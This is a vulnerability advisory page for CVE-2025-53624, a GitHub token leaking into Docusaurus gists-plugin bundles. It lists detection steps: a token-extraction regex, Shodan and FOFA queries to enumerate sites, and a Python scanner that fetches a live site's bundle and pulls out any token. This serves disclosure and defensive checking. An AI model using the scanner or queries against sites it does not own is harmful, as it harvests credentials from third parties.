CVE-2025-53624
published 2025-07-09


Priority: P271 · Severity: critical · CVSS 3.1 base score: 10
Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H

Exploit
EPSS: 1.84% (percentile 76.3)
The Docusaurus gists plugin adds a page to your Docusaurus instance, displaying all public gists of a GitHub user. docusaurus-plugin-content-gists versions prior to 4.0.0 are vulnerable to exposing GitHub Personal Access Tokens in production build artifacts when passed through plugin configuration options. The token, intended for build-time API access only, is inadvertently included in client-side JavaScript bundles, making it accessible to anyone who can view the website's source code. This vulnerability is fixed in 4.0.0.

Affected (2 ranges)

Vendor        Product                          Version range    Fixed in
webbertakken  docusaurus-plugin-content-gists  < 4.0.0          4.0.0
webbertakken  docusaurus-plugin-content-gists  >= 0, < 4.0.0    4.0.0

Detection & IOCs (extracted from sources)

path: /assets/js/main.*.js
other: ,personalAccessToken:"([^"]*)"}
  • Identify Docusaurus-powered sites by checking for the 'docusaurus_locale' string in the body of an HTTP 200 response, then fetch the main JS bundle at /assets/js/main.*.js
  • In the fetched client-side JS bundle, search for the regex pattern ',personalAccessToken:"([^"]*)"}' to extract the exposed GitHub Personal Access Token embedded in the production build artifact
  • Use the Shodan query 'http.html:"Docusaurus"' or the FOFA query 'body="Docusaurus"' to enumerate potentially vulnerable Docusaurus instances for further investigation
  • The check requires exactly 2 HTTP requests: first a GET to the base URL to confirm Docusaurus and extract the JS bundle filename, then a GET to the JS bundle path to confirm token presence
  • The token exposure only affects docusaurus-plugin-content-gists versions strictly prior to 4.0.0; version 4.0.0 and later are not vulnerable
  • The token is only exposed in production build artifacts (client-side JS bundles), not in development mode; scanning must target live production deployments
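The two-request check described in the list above, written out in Python as an added example; this is not code from cvebase, from the plugin, or from Docusaurus. The fingerprint string and the token regex are the ones quoted on the page; the fetch callable, the loose bundle-path pattern, the sample HTML and bundle text, and the placeholder token value are assumptions constructed for illustration so the block runs offline. It also adds one caveat a practitioner wants: the page's regex uses `[^"]*`, which matches an empty string, so a site that ships `personalAccessToken:""` would otherwise be reported as a hit.

```python
"""Two-request check for CVE-2025-53624 style token leakage in Docusaurus bundles.

Added example, not code from cvebase, the plugin, or Docusaurus. The HTTP layer
is a caller-supplied fetch(url) -> (status, body) callable (assumption) so the
check can be run offline against constructed samples.
"""
import re
from pathlib import Path
from typing import Callable, Dict, List, Optional, Tuple

Fetch = Callable[[str], Tuple[int, str]]  # (HTTP status code, response body)

# Fingerprint string quoted on the page (Docusaurus emits a docusaurus_locale meta tag).
DOCUSAURUS_MARKER = "docusaurus_locale"
# The page gives the bundle path as /assets/js/main.*.js; the hash is matched loosely (assumption).
BUNDLE_RE = re.compile(r'/assets/js/main\.[^"\'\s<>]+?\.js')
# Exact regex quoted on the page for the minified plugin options in the bundle.
TOKEN_RE = re.compile(r',personalAccessToken:"([^"]*)"}')


def is_docusaurus(status: int, html: str) -> bool:
    """Request 1: HTTP 200 and the 'docusaurus_locale' marker in the response body."""
    return status == 200 and DOCUSAURUS_MARKER in html


def bundle_path(html: str) -> Optional[str]:
    """Extract the main JS bundle path referenced from the site's HTML."""
    m = BUNDLE_RE.search(html)
    return m.group(0) if m else None


def leaked_tokens(js: str) -> List[str]:
    """Request 2: apply the page's regex to the bundle text.

    Caveat: '[^"]*' also matches an empty string, so a blank option
    (personalAccessToken:"") is not a leak and is filtered out here.
    """
    return [t for t in TOKEN_RE.findall(js) if t]


def scan(base_url: str, fetch: Fetch) -> Dict[str, object]:
    """Run the two-request check against one site and report the findings."""
    result: Dict[str, object] = {"docusaurus": False, "bundle": None, "tokens": []}
    status, html = fetch(base_url)
    if not is_docusaurus(status, html):
        return result
    result["docusaurus"] = True
    path = bundle_path(html)
    if path is None:
        return result
    result["bundle"] = path
    status, js = fetch(base_url.rstrip("/") + path)
    if status == 200:
        result["tokens"] = leaked_tokens(js)
    return result


def scan_build_dir(build_dir: str) -> List[Tuple[str, str]]:
    """Pre-deploy variant: run the same regex over your own production build output."""
    hits: List[Tuple[str, str]] = []
    for f in Path(build_dir).glob("assets/js/*.js"):
        for t in leaked_tokens(f.read_text(encoding="utf-8", errors="replace")):
            hits.append((f.name, t))
    return hits


# Constructed sample responses (not captured from any real site). The token value is
# a placeholder with the shape of a classic GitHub token, not a real credential.
PLACEHOLDER_TOKEN = "ghp_PLACEHOLDER_NOT_A_REAL_TOKEN_0000000"
SAMPLE_HTML = (
    '<!doctype html><html><head><meta name="docusaurus_locale" content="en">'
    '<script src="/assets/js/main.2f7e1b93.js"></script></head>'
    '<body><div id="__docusaurus"></div></body></html>'
)
SAMPLE_BUNDLE = (
    '...plugins:[["docusaurus-plugin-content-gists",{username:"octocat",'
    'personalAccessToken:"' + PLACEHOLDER_TOKEN + '"}]]...'
)
SAMPLE_BUNDLE_BLANK = '...{username:"octocat",personalAccessToken:""}...'


def sample_fetch(url: str) -> Tuple[int, str]:
    """Offline stand-in for an HTTP client that serves the constructed samples."""
    site = "https://docs.example.invalid"
    pages = {
        site: (200, SAMPLE_HTML),
        site + "/assets/js/main.2f7e1b93.js": (200, SAMPLE_BUNDLE),
    }
    return pages.get(url, (404, ""))


if __name__ == "__main__":
    print(scan("https://docs.example.invalid", sample_fetch))
```

To run it against a live site, pass a fetch that wraps your HTTP client and returns the status code and body text; scan_build_dir is the same regex pointed at a local build/ directory, which is the check to run before publishing rather than after.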